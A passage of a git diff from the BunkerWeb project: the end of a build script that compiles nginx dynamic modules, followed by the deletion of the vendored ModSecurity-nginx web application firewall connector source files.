echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/modsecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx/configure-fix.sh"
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd make -j $NTASK modules
do_and_check_cmd mkdir /usr/share/bunkerweb/modules
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd cp ./objs/*.so /usr/share/bunkerweb/modules
# Dependencies are installed
echo " Dependencies for BunkerWeb successfully compiled and installed !"

192
src/deps/src/ModSecurity-nginx/config
View File

@ -1,192 +0,0 @@
# vim: filetype=sh
# If $NGX_IGNORE_RPATH is set to "YES", we will ignore explicit
# library path specification on resulting binary, allowing libmodsecurity.so
# to be relocated across configured library pathes (adjust /etc/ld.so.conf
# or set $LD_LIBRARY_PATH environment variable to manage them)
#
# $YAJL_LIB variable may need to be populated in case of non-standard
# path of libyajl.so's installation
ngx_feature_name=
ngx_feature_run=no
ngx_feature_incs="#include <modsecurity/modsecurity.h>"
ngx_feature_libs="-lmodsecurity"
ngx_feature_test='printf("hello");'
ngx_modsecurity_opt_I=
ngx_modsecurity_opt_L=
YAJL_EXTRA=
if test -n "$YAJL_LIB"; then
YAJL_EXTRA="-L$YAJL_LIB -lyajl"
fi
# If $MODSECURITY_INC is specified, lets use it. Otherwise lets try
# the default paths
#
if [ -n "$MODSECURITY_INC" -o -n "$MODSECURITY_LIB" ]; then
# explicitly set ModSecurity lib path
ngx_feature="ModSecurity library in \"$MODSECURITY_LIB\" and \"$MODSECURITY_INC\" (specified by the MODSECURITY_LIB and MODSECURITY_INC env)"
ngx_feature_path="$MODSECURITY_INC"
ngx_modsecurity_opt_I="-I$MODSECURITY_INC"
ngx_modsecurity_opt_L="-L$MODSECURITY_LIB $YAJL_EXTRA"
if [ $NGX_RPATH = YES ]; then
ngx_feature_libs="-R$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
ngx_feature_libs="-Wl,-rpath,$MODSECURITY_LIB -L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
else
ngx_feature_libs="-L$MODSECURITY_LIB -lmodsecurity $YAJL_EXTRA"
fi
. auto/feature
if [ $ngx_found = no ]; then
cat << END
$0: error: ngx_http_modsecurity_module requires the ModSecurity library and MODSECURITY_LIB is defined as "$MODSECURITY_LIB" and MODSECURITY_INC (path for modsecurity.h) "$MODSECURITY_INC", but we cannot find ModSecurity there.
END
exit 1
fi
else
# auto-discovery
ngx_feature="ModSecurity library"
ngx_feature_libs="-lmodsecurity"
. auto/feature
if [ $ngx_found = no ]; then
ngx_feature="ModSecurity library in /usr/local/modsecurity"
ngx_feature_path="/usr/local/modsecurity/include"
if [ $NGX_RPATH = YES ]; then
ngx_feature_libs="-R/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
elif [ "$NGX_IGNORE_RPATH" != "YES" -a $NGX_SYSTEM = "Linux" ]; then
ngx_feature_libs="-Wl,-rpath,/usr/local/modsecurity/lib -L/usr/local/modsecurity/lib -lmodsecurity"
else
ngx_feature_libs="-L/usr/local/modsecurity/lib -lmodsecurity"
fi
. auto/feature
fi
fi
if [ $ngx_found = no ]; then
cat << END
$0: error: ngx_http_modsecurity_module requires the ModSecurity library.
END
exit 1
fi
ngx_addon_name=ngx_http_modsecurity_module
# We must place ngx_http_modsecurity_module after ngx_http_gzip_filter_module
# in load order list to be able to read response body before it gets compressed
# (for filter modules later initialization means earlier execution).
#
# Nginx implements load ordering only for dynamic modules and only a BEFORE part
# of "ngx_module_order". So we list all of the modules that come after
# ngx_http_gzip_filter_module as a BEFORE dependency for
# ngx_http_modsecurity_module.
#
# For static compilation HTTP_FILTER_MODULES will be patched later.
modsecurity_dependency="ngx_http_postpone_filter_module \
ngx_http_ssi_filter_module \
ngx_http_charset_filter_module \
ngx_http_xslt_filter_module \
ngx_http_image_filter_module \
ngx_http_sub_filter_module \
ngx_http_addition_filter_module \
ngx_http_gunzip_filter_module \
ngx_http_userid_filter_module \
ngx_http_headers_filter_module \
ngx_http_copy_filter_module"
if test -n "$ngx_module_link"; then
ngx_module_type=HTTP_FILTER
ngx_module_name="$ngx_addon_name"
ngx_module_srcs="$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
"
ngx_module_deps="$ngx_addon_dir/src/ddebug.h \
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
"
ngx_module_libs="$ngx_feature_libs"
ngx_module_incs="$ngx_feature_path"
ngx_module_order="ngx_http_chunked_filter_module \
ngx_http_v2_filter_module \
ngx_http_range_header_filter_module \
ngx_http_gzip_filter_module \
$ngx_module_name \
$modsecurity_dependency";
. auto/module
else
CFLAGS="$ngx_modsecurity_opt_I $CFLAGS"
NGX_LD_OPT="$ngx_modsecurity_opt_L $NGX_LD_OPT"
CORE_INCS="$CORE_INCS $ngx_feature_path"
CORE_LIBS="$CORE_LIBS $ngx_feature_libs"
HTTP_FILTER_MODULES="$HTTP_FILTER_MODULES ngx_http_modsecurity_module"
NGX_ADDON_SRCS="\
$NGX_ADDON_SRCS \
$ngx_addon_dir/src/ngx_http_modsecurity_module.c \
$ngx_addon_dir/src/ngx_http_modsecurity_access.c \
$ngx_addon_dir/src/ngx_http_modsecurity_header_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_body_filter.c \
$ngx_addon_dir/src/ngx_http_modsecurity_log.c \
$ngx_addon_dir/src/ngx_http_modsecurity_rewrite.c \
"
NGX_ADDON_DEPS="\
$NGX_ADDON_DEPS \
$ngx_addon_dir/src/ddebug.h \
$ngx_addon_dir/src/ngx_http_modsecurity_common.h \
"
fi
#
# Nginx does not provide reliable way to introduce our module into required
# place in static ($ngx_module_link=ADDON) compilation mode, so we must
# explicitly update module "ordering rules".
#
if [ "$ngx_module_link" != DYNAMIC ] ; then
# Reposition modsecurity module to satisfy $modsecurity_dependency
# (this mimics dependency resolution made by ngx_add_module() function
# though less optimal in terms of computational complexity).
modules=
found=
for module in $HTTP_FILTER_MODULES; do
# skip our module name from the original list
if [ "$module" = "$ngx_addon_name" ]; then
continue
fi
if [ -z "${found}" ]; then
for item in $modsecurity_dependency; do
if [ "$module" = "$item" ]; then
modules="${modules} $ngx_addon_name"
found=1
break
fi
done
fi
modules="${modules} $module"
done
if [ -z "${found}" ]; then
# This must never happen since ngx_http_copy_filter_module must be in HTTP_FILTER_MODULES
# and we stated dependency on it in $modsecurity_dependency
echo "$0: error: cannot reposition modsecurity module in HTTP_FILTER_MODULES list"
exit 1
fi
HTTP_FILTER_MODULES="${modules}"
fi

228
src/deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_access.c
View File

@ -1,228 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef MODSECURITY_DDEBUG
#define MODSECURITY_DDEBUG 0
#endif
#include "ddebug.h"
#include "ngx_http_modsecurity_common.h"
void
ngx_http_modsecurity_request_read(ngx_http_request_t *r)
{
ngx_http_modsecurity_ctx_t *ctx;
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
#if defined(nginx_version) && nginx_version >= 8011
r->main->count--;
#endif
if (ctx->waiting_more_body)
{
ctx->waiting_more_body = 0;
r->write_event_handler = ngx_http_core_run_phases;
ngx_http_core_run_phases(r);
}
}
ngx_int_t
ngx_http_modsecurity_access_handler(ngx_http_request_t *r)
{
#if 1
ngx_pool_t *old_pool;
ngx_http_modsecurity_ctx_t *ctx;
ngx_http_modsecurity_conf_t *mcf;
dd("catching a new _access_ phase handler");
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
if (mcf == NULL || mcf->enable != 1)
{
dd("ModSecurity not enabled... returning");
return NGX_DECLINED;
}
/*
* FIXME:
* In order to perform some tests, let's accept everything.
*
if (r->method != NGX_HTTP_GET &&
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
dd("ModSecurity is not ready to deal with anything different from " \
"POST, GET or HEAD");
return NGX_DECLINED;
}
*/
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
dd("recovering ctx: %p", ctx);
if (ctx == NULL)
{
dd("ctx is null; Nothing we can do, returning an error.");
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
if (ctx->intervention_triggered) {
return NGX_DECLINED;
}
if (ctx->waiting_more_body == 1)
{
dd("waiting for more data before proceed. / count: %d",
r->main->count);
return NGX_DONE;
}
if (ctx->body_requested == 0)
{
ngx_int_t rc = NGX_OK;
ctx->body_requested = 1;
dd("asking for the request body, if any. Count: %d",
r->main->count);
/**
* TODO: Check if there is any benefit to use request_body_in_single_buf set to 1.
*
* saw some module using this request_body_in_single_buf
* but not sure what exactly it does, same for the others options below.
*
* r->request_body_in_single_buf = 1;
*/
r->request_body_in_single_buf = 1;
r->request_body_in_persistent_file = 1;
if (!r->request_body_in_file_only) {
// If the above condition fails, then the flag below will have been
// set correctly elsewhere. We need to set the flag here for other
// conditions (client_body_in_file_only not used but
// client_body_buffer_size is)
r->request_body_in_clean_file = 1;
}
rc = ngx_http_read_client_request_body(r,
ngx_http_modsecurity_request_read);
if (rc == NGX_ERROR || rc >= NGX_HTTP_SPECIAL_RESPONSE) {
#if (nginx_version < 1002006) || \
(nginx_version >= 1003000 && nginx_version < 1003009)
r->main->count--;
#endif
return rc;
}
if (rc == NGX_AGAIN)
{
dd("nginx is asking us to wait for more data.");
ctx->waiting_more_body = 1;
return NGX_DONE;
}
}
if (ctx->waiting_more_body == 0)
{
int ret = 0;
int already_inspected = 0;
dd("request body is ready to be processed");
r->write_event_handler = ngx_http_core_run_phases;
ngx_chain_t *chain = r->request_body->bufs;
/**
* TODO: Speed up the analysis by sending chunk while they arrive.
*
* Notice that we are waiting for the full request body to
* start to process it, it may not be necessary. We may send
* the chunks to ModSecurity while nginx keep calling this
* function.
*/
if (r->request_body->temp_file != NULL) {
ngx_str_t file_path = r->request_body->temp_file->file.name;
const char *file_name = ngx_str_to_char(file_path, r->pool);
if (file_name == (char*)-1) {
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
/*
* Request body was saved to a file, probably we don't have a
* copy of it in memory.
*/
dd("request body inspection: file -- %s", file_name);
msc_request_body_from_file(ctx->modsec_transaction, file_name);
already_inspected = 1;
} else {
dd("inspection request body in memory.");
}
while (chain && !already_inspected)
{
u_char *data = chain->buf->pos;
msc_append_request_body(ctx->modsec_transaction, data,
chain->buf->last - data);
if (chain->buf->last_buf) {
break;
}
chain = chain->next;
/* XXX: chains are processed one-by-one, maybe worth to pass all chains and then call intervention() ? */
/**
* ModSecurity may perform stream inspection on this buffer,
* it may ask for a intervention in consequence of that.
*
*/
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
if (ret > 0) {
return ret;
}
}
/**
* At this point, all the request body was sent to ModSecurity
* and we want to make sure that all the request body inspection
* happened; consequently we have to check if ModSecurity have
* returned any kind of intervention.
*/
/* XXX: once more -- is body can be modified ? content-length need to be adjusted ? */
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
msc_process_request_body(ctx->modsec_transaction);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
ret = ngx_http_modsecurity_process_intervention(ctx->modsec_transaction, r, 0);
if (r->error_page) {
return NGX_DECLINED;
}
if (ret > 0) {
return ret;
}
}
dd("Nothing to add on the body inspection, reclaiming a NGX_DECLINED");
#endif
return NGX_DECLINED;
}

173
src/deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_common.h
View File

@ -1,173 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
#define _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_
#include <nginx.h>
#include <ngx_config.h>
#include <ngx_core.h>
#include <ngx_http.h>
#include <modsecurity/modsecurity.h>
#include <modsecurity/transaction.h>
/* #define MSC_USE_RULES_SET 1 */
#if defined(MODSECURITY_CHECK_VERSION)
#if MODSECURITY_VERSION_NUM >= 304010
#define MSC_USE_RULES_SET 1
#endif
#endif
#if defined(MSC_USE_RULES_SET)
#include <modsecurity/rules_set.h>
#else
#include <modsecurity/rules.h>
#endif
/**
* TAG_NUM:
*
* Alpha - 001
* Beta - 002
* Dev - 010
* Rc1 - 051
* Rc2 - 052
* ... - ...
* Release- 100
*
*/
#define MODSECURITY_NGINX_MAJOR "1"
#define MODSECURITY_NGINX_MINOR "0"
#define MODSECURITY_NGINX_PATCHLEVEL "3"
#define MODSECURITY_NGINX_TAG ""
#define MODSECURITY_NGINX_TAG_NUM "100"
#define MODSECURITY_NGINX_VERSION MODSECURITY_NGINX_MAJOR "." \
MODSECURITY_NGINX_MINOR "." MODSECURITY_NGINX_PATCHLEVEL \
MODSECURITY_NGINX_TAG
#define MODSECURITY_NGINX_VERSION_NUM MODSECURITY_NGINX_MAJOR \
MODSECURITY_NGINX_MINOR MODSECURITY_NGINX_PATCHLEVEL \
MODSECURITY_NGINX_TAG_NUM
#define MODSECURITY_NGINX_WHOAMI "ModSecurity-nginx v" \
MODSECURITY_NGINX_VERSION
typedef struct {
ngx_str_t name;
ngx_str_t value;
} ngx_http_modsecurity_header_t;
typedef struct {
ngx_http_request_t *r;
Transaction *modsec_transaction;
ModSecurityIntervention *delayed_intervention;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
/*
* Should be filled with the headers that were sent to ModSecurity.
*
* The idea is to compare this set of headers with the headers that were
* sent to the client. This check was placed because we don't have control
* over other modules, thus, we may partially inspect the headers.
*
*/
ngx_array_t *sanity_headers_out;
#endif
unsigned waiting_more_body:1;
unsigned body_requested:1;
unsigned processed:1;
unsigned logged:1;
unsigned intervention_triggered:1;
} ngx_http_modsecurity_ctx_t;
typedef struct {
void *pool;
ModSecurity *modsec;
ngx_uint_t rules_inline;
ngx_uint_t rules_file;
ngx_uint_t rules_remote;
} ngx_http_modsecurity_main_conf_t;
typedef struct {
void *pool;
/* RulesSet or Rules */
void *rules_set;
ngx_flag_t enable;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ngx_flag_t sanity_checks_enabled;
#endif
ngx_http_complex_value_t *transaction_id;
} ngx_http_modsecurity_conf_t;
typedef ngx_int_t (*ngx_http_modsecurity_resolv_header_pt)(ngx_http_request_t *r, ngx_str_t name, off_t offset);
typedef struct {
ngx_str_t name;
ngx_uint_t offset;
ngx_http_modsecurity_resolv_header_pt resolver;
} ngx_http_modsecurity_header_out_t;
extern ngx_module_t ngx_http_modsecurity_module;
/* ngx_http_modsecurity_module.c */
int ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log);
ngx_http_modsecurity_ctx_t *ngx_http_modsecurity_create_ctx(ngx_http_request_t *r);
char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p);
#if (NGX_PCRE2)
#define ngx_http_modsecurity_pcre_malloc_init(x) NULL
#define ngx_http_modsecurity_pcre_malloc_done(x) (void)x
#else
ngx_pool_t *ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool);
void ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool);
#endif
/* ngx_http_modsecurity_body_filter.c */
ngx_int_t ngx_http_modsecurity_body_filter_init(void);
ngx_int_t ngx_http_modsecurity_body_filter(ngx_http_request_t *r, ngx_chain_t *in);
/* ngx_http_modsecurity_header_filter.c */
ngx_int_t ngx_http_modsecurity_header_filter_init(void);
ngx_int_t ngx_http_modsecurity_header_filter(ngx_http_request_t *r);
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
int ngx_http_modsecurity_store_ctx_header(ngx_http_request_t *r, ngx_str_t *name, ngx_str_t *value);
#endif
/* ngx_http_modsecurity_log.c */
void ngx_http_modsecurity_log(void *log, const void* data);
ngx_int_t ngx_http_modsecurity_log_handler(ngx_http_request_t *r);
/* ngx_http_modsecurity_access.c */
ngx_int_t ngx_http_modsecurity_access_handler(ngx_http_request_t *r);
/* ngx_http_modsecurity_rewrite.c */
ngx_int_t ngx_http_modsecurity_rewrite_handler(ngx_http_request_t *r);
#endif /* _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_ */

81
src/deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_log.c
View File

@ -1,81 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef MODSECURITY_DDEBUG
#define MODSECURITY_DDEBUG 0
#endif
#include "ddebug.h"
#include "ngx_http_modsecurity_common.h"
void
ngx_http_modsecurity_log(void *log, const void* data)
{
const char *msg;
if (log == NULL) {
return;
}
msg = (const char *) data;
ngx_log_error(NGX_LOG_WARN, (ngx_log_t *)log, 0, "%s", msg);
}
ngx_int_t
ngx_http_modsecurity_log_handler(ngx_http_request_t *r)
{
ngx_pool_t *old_pool;
ngx_http_modsecurity_ctx_t *ctx;
ngx_http_modsecurity_conf_t *mcf;
dd("catching a new _log_ phase handler");
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
if (mcf == NULL || mcf->enable != 1)
{
dd("ModSecurity not enabled... returning");
return NGX_OK;
}
/*
if (r->method != NGX_HTTP_GET &&
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
dd("ModSecurity is not ready to deal with anything different from " \
"POST, GET or HEAD");
return NGX_OK;
}
*/
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
dd("recovering ctx: %p", ctx);
if (ctx == NULL) {
dd("something really bad happened here. returning NGX_ERROR");
return NGX_ERROR;
}
if (ctx->logged) {
dd("already logged earlier");
return NGX_OK;
}
dd("calling msc_process_logging for %p", ctx);
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
msc_process_logging(ctx->modsec_transaction);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
return NGX_OK;
}

793
src/deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_module.c
View File

@ -1,793 +0,0 @@
/*
* ModSecurity connector for nginx, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
*/
#ifndef MODSECURITY_DDEBUG
#define MODSECURITY_DDEBUG 0
#endif
#include "ddebug.h"
#include "ngx_http_modsecurity_common.h"
#include "stdio.h"
#include <ngx_config.h>
#include <ngx_core.h>
#include <ngx_http.h>
static ngx_int_t ngx_http_modsecurity_init(ngx_conf_t *cf);
static void *ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf);
static char *ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf);
static void *ngx_http_modsecurity_create_conf(ngx_conf_t *cf);
static char *ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child);
static void ngx_http_modsecurity_cleanup_instance(void *data);
static void ngx_http_modsecurity_cleanup_rules(void *data);
/*
* PCRE malloc/free workaround, based on
* https://github.com/openresty/lua-nginx-module/blob/master/src/ngx_http_lua_pcrefix.c
*/
#if !(NGX_PCRE2)
static void *(*old_pcre_malloc)(size_t);
static void (*old_pcre_free)(void *ptr);
static ngx_pool_t *ngx_http_modsec_pcre_pool = NULL;
static void *
ngx_http_modsec_pcre_malloc(size_t size)
{
if (ngx_http_modsec_pcre_pool) {
return ngx_palloc(ngx_http_modsec_pcre_pool, size);
}
fprintf(stderr, "error: modsec pcre malloc failed due to empty pcre pool");
return NULL;
}
static void
ngx_http_modsec_pcre_free(void *ptr)
{
if (ngx_http_modsec_pcre_pool) {
ngx_pfree(ngx_http_modsec_pcre_pool, ptr);
return;
}
#if 0
/* this may happen when called from cleanup handlers */
fprintf(stderr, "error: modsec pcre free failed due to empty pcre pool");
#endif
return;
}
ngx_pool_t *
ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool)
{
ngx_pool_t *old_pool;
if (pcre_malloc != ngx_http_modsec_pcre_malloc) {
ngx_http_modsec_pcre_pool = pool;
old_pcre_malloc = pcre_malloc;
old_pcre_free = pcre_free;
pcre_malloc = ngx_http_modsec_pcre_malloc;
pcre_free = ngx_http_modsec_pcre_free;
return NULL;
}
old_pool = ngx_http_modsec_pcre_pool;
ngx_http_modsec_pcre_pool = pool;
return old_pool;
}
void
ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool)
{
ngx_http_modsec_pcre_pool = old_pool;
if (old_pool == NULL) {
pcre_malloc = old_pcre_malloc;
pcre_free = old_pcre_free;
}
}
#endif
/*
* ngx_string's are not null-terminated in common case, so we need to convert
* them into null-terminated ones before passing to ModSecurity
*/
ngx_inline char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p)
{
char *str = NULL;
if (a.len == 0) {
return NULL;
}
str = ngx_pnalloc(p, a.len+1);
if (str == NULL) {
dd("failed to allocate memory to convert space ngx_string to C string");
/* We already returned NULL for an empty string, so return -1 here to indicate allocation error */
return (char *)-1;
}
ngx_memcpy(str, a.data, a.len);
str[a.len] = '\0';
return str;
}
ngx_inline int
ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log)
{
char *log = NULL;
ModSecurityIntervention intervention;
intervention.status = 200;
intervention.url = NULL;
intervention.log = NULL;
intervention.disruptive = 0;
ngx_http_modsecurity_ctx_t *ctx = NULL;
dd("processing intervention");
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
if (ctx == NULL)
{
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
if (msc_intervention(transaction, &intervention) == 0) {
dd("nothing to do");
return 0;
}
log = intervention.log;
if (intervention.log == NULL) {
log = "(no log message was specified)";
}
ngx_log_error(NGX_LOG_ERR, (ngx_log_t *)r->connection->log, 0, "%s", log);
if (intervention.log != NULL) {
free(intervention.log);
}
if (intervention.url != NULL)
{
dd("intervention -- redirecting to: %s with status code: %d", intervention.url, intervention.status);
if (r->header_sent)
{
dd("Headers are already sent. Cannot perform the redirection at this point.");
return -1;
}
/**
* Not sure if it sane to do this indepent of the phase
* but, here we go...
*
* This code cames from: http/ngx_http_special_response.c
* function: ngx_http_send_error_page
* src/http/ngx_http_core_module.c
* From src/http/ngx_http_core_module.c (line 1910) i learnt
* that location->hash should be set to 1.
*
*/
ngx_http_clear_location(r);
ngx_str_t a = ngx_string("");
a.data = (unsigned char *)intervention.url;
a.len = strlen(intervention.url);
ngx_table_elt_t *location = NULL;
location = ngx_list_push(&r->headers_out.headers);
ngx_str_set(&location->key, "Location");
location->value = a;
r->headers_out.location = location;
r->headers_out.location->hash = 1;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ngx_http_modsecurity_store_ctx_header(r, &location->key, &location->value);
#endif
return intervention.status;
}
if (intervention.status != 200)
{
/**
* FIXME: this will bring proper response code to audit log in case
* when e.g. error_page redirect was triggered, but there still won't be another
* required pieces like response headers etc.
*
*/
msc_update_status_code(ctx->modsec_transaction, intervention.status);
if (early_log) {
dd("intervention -- calling log handler manually with code: %d", intervention.status);
ngx_http_modsecurity_log_handler(r);
ctx->logged = 1;
}
if (r->header_sent)
{
dd("Headers are already sent. Cannot perform the redirection at this point.");
return -1;
}
dd("intervention -- returning code: %d", intervention.status);
return intervention.status;
}
return 0;
}
void
ngx_http_modsecurity_cleanup(void *data)
{
ngx_http_modsecurity_ctx_t *ctx;
ctx = (ngx_http_modsecurity_ctx_t *) data;
msc_transaction_cleanup(ctx->modsec_transaction);
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
/*
* Purge stored context headers. Memory allocated for individual stored header
* name/value pair will be freed automatically when r->pool is destroyed.
*/
ngx_array_destroy(ctx->sanity_headers_out);
#endif
}
ngx_inline ngx_http_modsecurity_ctx_t *
ngx_http_modsecurity_create_ctx(ngx_http_request_t *r)
{
ngx_str_t s;
ngx_pool_cleanup_t *cln;
ngx_http_modsecurity_ctx_t *ctx;
ngx_http_modsecurity_conf_t *mcf;
ngx_http_modsecurity_main_conf_t *mmcf;
ctx = ngx_pcalloc(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
if (ctx == NULL)
{
dd("failed to allocate memory for the context.");
return NULL;
}
mmcf = ngx_http_get_module_main_conf(r, ngx_http_modsecurity_module);
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
dd("creating transaction with the following rules: '%p' -- ms: '%p'", mcf->rules_set, mmcf->modsec);
if (mcf->transaction_id) {
if (ngx_http_complex_value(r, mcf->transaction_id, &s) != NGX_OK) {
return NGX_CONF_ERROR;
}
ctx->modsec_transaction = msc_new_transaction_with_id(mmcf->modsec, mcf->rules_set, (char *) s.data, r->connection->log);
} else {
ctx->modsec_transaction = msc_new_transaction(mmcf->modsec, mcf->rules_set, r->connection->log);
}
dd("transaction created");
ngx_http_set_ctx(r, ctx, ngx_http_modsecurity_module);
cln = ngx_pool_cleanup_add(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
if (cln == NULL)
{
dd("failed to create the ModSecurity context cleanup");
return NGX_CONF_ERROR;
}
cln->handler = ngx_http_modsecurity_cleanup;
cln->data = ctx;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ctx->sanity_headers_out = ngx_array_create(r->pool, 12, sizeof(ngx_http_modsecurity_header_t));
if (ctx->sanity_headers_out == NULL) {
return NGX_CONF_ERROR;
}
#endif
return ctx;
}
char *
ngx_conf_set_rules(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
{
int res;
char *rules;
ngx_str_t *value;
const char *error;
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf = conf;
ngx_http_modsecurity_main_conf_t *mmcf;
value = cf->args->elts;
rules = ngx_str_to_char(value[1], cf->pool);
if (rules == (char *)-1) {
return NGX_CONF_ERROR;
}
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
res = msc_rules_add(mcf->rules_set, rules, &error);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
if (res < 0) {
dd("Failed to load the rules: '%s' - reason: '%s'", rules, error);
return strdup(error);
}
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
mmcf->rules_inline += res;
return NGX_CONF_OK;
}
char *
ngx_conf_set_rules_file(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
{
int res;
char *rules_set;
ngx_str_t *value;
const char *error;
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf = conf;
ngx_http_modsecurity_main_conf_t *mmcf;
value = cf->args->elts;
rules_set = ngx_str_to_char(value[1], cf->pool);
if (rules_set == (char *)-1) {
return NGX_CONF_ERROR;
}
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
res = msc_rules_add_file(mcf->rules_set, rules_set, &error);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
